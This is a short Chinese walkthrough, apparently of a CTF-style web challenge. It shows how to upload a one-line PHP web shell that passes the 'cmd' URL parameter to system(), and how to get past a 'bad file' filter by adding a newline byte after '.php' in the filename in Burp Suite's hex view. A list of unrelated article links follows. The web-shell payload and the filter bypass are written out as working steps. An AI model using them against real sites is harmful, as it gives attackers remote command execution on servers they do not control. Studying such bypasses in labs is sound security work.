Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
lengjingzju21 小时前
基于IMake的 GCC 编译与链接选项深度解析:构建高效、安全、可调试的现代软件I · T · LUCKYBOOM1 天前
iptables防火墙_Orch1d1 天前
详解SSL/TLS协议握手协议、记录层协议与警报协议chenyuhao20241 天前
Linux网络编程:HTTP协议duration~1 天前
IPv6 详解广东大榕树信息科技有限公司1 天前
动环监控如何有效提升机房环境管理的可靠性与响应速度?招风的黑耳1 天前
Web系统原型设计:架构复杂信息,赋能高效工作zhengfei6111 天前
【POC漏洞】XXX网上阅卷系统 monitor 未授权访问福尔摩斯张1 天前
Linux的pthread_self函数详解:多线程编程中的身份标识器(超详细)ArrebolJiuZhou1 天前
02arm指令集(一)——LDR,MOV,STR的使用